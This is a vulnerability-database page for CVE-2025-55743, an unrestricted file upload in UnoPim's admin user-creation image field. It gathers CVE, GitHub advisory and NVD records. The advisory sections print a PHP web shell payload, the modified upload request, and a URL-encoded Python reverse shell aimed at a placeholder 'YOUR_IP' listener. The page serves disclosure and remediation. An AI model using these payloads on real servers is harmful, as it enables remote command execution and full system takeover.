cvelistv5 - cve-2025-55743

CVE-2025-55743 (GCVE-0-2025-55743)

Vulnerability from cvelistv5 – Published: 2025-08-21 15:45 – Updated: 2025-08-21 20:00

Summary

UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, the image upload at the user creation feature performs only client side file type validation. A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. Make changes to the file extension and content. The vulnerability is fixed in 0.2.1.

Severity ?

7.3 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

CWE

CWE-434 - Unrestricted Upload of File with Dangerous Type

Assigner

GitHub_M

References

URL

Tags

	https://github.com/unopim/unopim/security/advisor…	x_refsource_CONFIRM
	https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	unopim	unopim	Affected: < 0.2.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-55743",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-08-21T19:59:51.804239Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-08-21T20:00:06.996Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "unopim",
          "vendor": "unopim",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.2.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, the image upload at the user creation feature performs only client side file type validation. A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. Make changes to the file extension and content. The vulnerability is fixed in 0.2.1."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "privilegesRequired": "HIGH",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-434",
              "description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-21T15:45:32.296Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/unopim/unopim/security/advisories/GHSA-v22v-xwh7-2vrm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/unopim/unopim/security/advisories/GHSA-v22v-xwh7-2vrm"
        },
        {
          "name": "https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn"
        }
      ],
      "source": {
        "advisory": "GHSA-v22v-xwh7-2vrm",
        "discovery": "UNKNOWN"
      },
      "title": "UnoPim vulnerable to remote code execution through Arbitrary File upload"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-55743",
    "datePublished": "2025-08-21T15:45:32.296Z",
    "dateReserved": "2025-08-14T22:31:17.685Z",
    "dateUpdated": "2025-08-21T20:00:06.996Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-55743\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-21T16:15:34.467\",\"lastModified\":\"2025-08-22T21:53:47.107\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, the image upload at the user creation feature performs only client side file type validation. A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. Make changes to the file extension and content. The vulnerability is fixed in 0.2.1.\"},{\"lang\":\"es\",\"value\":\"UnoPim es un sistema de Gesti\u00f3n de Informaci\u00f3n de Producto (PIM) de c\u00f3digo abierto basado en el framework Laravel. Antes de la versi\u00f3n 0.2.1, la funci\u00f3n de carga de im\u00e1genes al crear un usuario solo validaba el tipo de archivo del lado del cliente. Un usuario puede capturar la solicitud subiendo una imagen o a trav\u00e9s de un proxy como Burp. Modifique la extensi\u00f3n y el contenido del archivo. La vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 0.2.1.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-434\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:webkul:unopim:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.2.1\",\"matchCriteriaId\":\"1EFD0FCC-3460-4CCD-ACBD-6541CF5CD81C\"}]}]}],\"references\":[{\"url\":\"https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\"]},{\"url\":\"https://github.com/unopim/unopim/security/advisories/GHSA-v22v-xwh7-2vrm\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-55743\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-21T19:59:51.804239Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-21T19:59:59.600Z\"}}], \"cna\": {\"title\": \"UnoPim vulnerable to remote code execution through Arbitrary File upload\", \"source\": {\"advisory\": \"GHSA-v22v-xwh7-2vrm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"unopim\", \"product\": \"unopim\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.2.1\"}]}], \"references\": [{\"url\": \"https://github.com/unopim/unopim/security/advisories/GHSA-v22v-xwh7-2vrm\", \"name\": \"https://github.com/unopim/unopim/security/advisories/GHSA-v22v-xwh7-2vrm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn\", \"name\": \"https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, the image upload at the user creation feature performs only client side file type validation. A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. Make changes to the file extension and content. The vulnerability is fixed in 0.2.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-434\", \"description\": \"CWE-434: Unrestricted Upload of File with Dangerous Type\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-21T15:45:32.296Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-55743\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-21T20:00:06.996Z\", \"dateReserved\": \"2025-08-14T22:31:17.685Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-21T15:45:32.296Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-V22V-XWH7-2VRM

Vulnerability from github – Published: 2025-08-21 14:26 – Updated: 2025-08-21 19:16

Summary

UnoPim vulnerable to remote code execution through Arbitrary File upload

Details

Summary:

Affected Functionality: Image upload at User creation Endpoint: /admin/settings/users/create

Details

The image upload at the user creation feature performs only client side file type validation. A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. Make changes to the file extension and content. The .php file when accessed through the link runs the code we provided inside the file.

Modified part of the multipart request body:

Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: application/x-php

<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

PoC

Upload an image file as profile picture during user creation , now capture the request and modify. File content: <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?> File name: poc.php Content-Type can be any, doesn't matter.
Access the uploaded file e.g. http://localhost:8000/storage/admins/21/poc.php?cmd=ls // pass the command to run as parameter value for cmd, example running ls command on the system

Likewise the following reverse shell code ( reverse shell of other languages ) can be executed to create a connection to attacker controlled system Command:

python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",7000));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn("sh")%27

// Make sure netcat is running on port 7000 // change IP accordingly

Impact

Every user in the dashboard is allowed to change their profile picture, thus allowing any of these users to execute malicious actions at the Server level. Usually a server might host multiple applications, allowing execution of system commands allows complete control of the system. The impact of an RCE vulnerability can be full system compromise, access to database and filesystem, access other sensitive devices on the network. Please see the POC video: https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn

Recommendation:

Extension Validation: Whitelist allowed extensions. ( use endswith() check rather than contains() as an attacker can bypass such a restriction with filename: poc.jpg.php

Severity ?

7.3 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "unopim/unopim"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55743"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-434"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-21T14:26:31Z",
    "nvd_published_at": "2025-08-21T16:15:34Z",
    "severity": "HIGH"
  },
  "details": "### Summary:\nAffected Functionality: **Image upload at User creation**\nEndpoint: `/admin/settings/users/create`\n\n### Details\nThe image upload at the user creation feature performs only client side file type validation.\nA user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. \nMake changes to the file extension and content. The .php file when accessed through the link runs the code we provided inside the file.\n\nModified part of the multipart request body:\n```\nContent-Disposition: form-data; name=\"image[]\"; filename=\"poc.php\"\nContent-Type: application/x-php\n\n\u003c?php if(isset($_REQUEST[\u0027cmd\u0027])){ $cmd = ($_REQUEST[\u0027cmd\u0027]); system($cmd); die; }?\u003e\n```\n\n### PoC\n 1. Upload an image file as profile picture during user creation , now capture the request and modify.\n File content: ```\u003c?php if(isset($_REQUEST[\u0027cmd\u0027])){ $cmd = ($_REQUEST[\u0027cmd\u0027]); system($cmd); die; }?\u003e```\n File name: poc.php\n Content-Type can be any, doesn\u0027t matter. \n 2. Access the uploaded file e.g. http://localhost:8000/storage/admins/21/poc.php?cmd=ls\n // pass the command to run as parameter value for `cmd`, example running `ls` command on the system\n\nLikewise the following reverse shell code ( [reverse shell of other languages](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) ) can be executed to create a connection to attacker controlled system\nCommand:\n```\npython3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_IP\",7000));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(\"sh\")%27\n```\n// Make sure `netcat` is running on port `7000`\n// change `IP` accordingly\n\n### Impact\nEvery user in the dashboard is allowed to change their profile picture, thus allowing any of these users to execute malicious actions at the Server level. Usually a server might host multiple applications, allowing execution of system commands allows complete control of the system. The impact of an RCE vulnerability can be full system compromise, access to database and filesystem, access other sensitive devices on the network.\nPlease see the POC video: https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn\n\n\n### Recommendation:\nExtension Validation: Whitelist allowed extensions. ( use `endswith()` check rather than `contains()` as an attacker can bypass such a restriction with filename: poc.jpg.php",
  "id": "GHSA-v22v-xwh7-2vrm",
  "modified": "2025-08-21T19:16:45Z",
  "published": "2025-08-21T14:26:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/unopim/unopim/security/advisories/GHSA-v22v-xwh7-2vrm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55743"
    },
    {
      "type": "WEB",
      "url": "https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/unopim/unopim"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "UnoPim vulnerable to remote code execution through Arbitrary File upload"
}

FKIE_CVE-2025-55743

Vulnerability from fkie_nvd - Published: 2025-08-21 16:15 - Updated: 2025-08-22 21:53

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn	Exploit
	security-advisories@github.com	https://github.com/unopim/unopim/security/advisories/GHSA-v22v-xwh7-2vrm	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	webkul	unopim	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:webkul:unopim:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EFD0FCC-3460-4CCD-ACBD-6541CF5CD81C",
              "versionEndExcluding": "0.2.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, the image upload at the user creation feature performs only client side file type validation. A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. Make changes to the file extension and content. The vulnerability is fixed in 0.2.1."
    },
    {
      "lang": "es",
      "value": "UnoPim es un sistema de Gesti\u00f3n de Informaci\u00f3n de Producto (PIM) de c\u00f3digo abierto basado en el framework Laravel. Antes de la versi\u00f3n 0.2.1, la funci\u00f3n de carga de im\u00e1genes al crear un usuario solo validaba el tipo de archivo del lado del cliente. Un usuario puede capturar la solicitud subiendo una imagen o a trav\u00e9s de un proxy como Burp. Modifique la extensi\u00f3n y el contenido del archivo. La vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 0.2.1."
    }
  ],
  "id": "CVE-2025-55743",
  "lastModified": "2025-08-22T21:53:47.107",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 7.3,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "HIGH",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-08-21T16:15:34.467",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit"
      ],
      "url": "https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/unopim/unopim/security/advisories/GHSA-v22v-xwh7-2vrm"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-434"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-55743 (GCVE-0-2025-55743)

GHSA-V22V-XWH7-2VRM

Summary:

Details

PoC

Impact

Recommendation:

FKIE_CVE-2025-55743

Tags

Sightings

Nomenclature